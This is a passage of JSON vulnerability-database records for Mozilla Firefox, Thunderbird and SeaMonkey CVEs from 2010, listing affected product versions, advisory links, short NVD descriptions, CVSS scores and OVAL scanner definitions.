"cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3180", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3180", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:03", "references": ["http://www.redhat.com/support/errata/RHSA-2010-0781.html", "http://lists.opensuse.org/opensuse-security-announce/2010-11/msg00001.html", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://support.avaya.com/css/P8/documents/100114250", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2123", "http://www.ubuntu.com/usn/USN-1007-1", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-70.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=578697"], "description": "Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 recognize a wildcard IP address in the subject's Common Name field of an X.509 certificate, which might allow man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:02", "title": "CVE-2010-3170", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:03", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12254", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12254"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3170"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12254", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12254"}], "modified": "2017-09-18T21:31:15", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3170", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3170", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["http://www.redhat.com/support/errata/RHSA-2010-0781.html", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.securityfocus.com/bid/44251", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://support.avaya.com/css/P8/documents/100114250", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=590753", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.redhat.com/support/errata/RHSA-2010-0780.html", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-71.html"], "description": "A certain application-launch script in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 on Linux places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse shared library in the current working directory.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3182", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 7.2}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:13844", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13844"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3182"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:13844", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:13844"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", 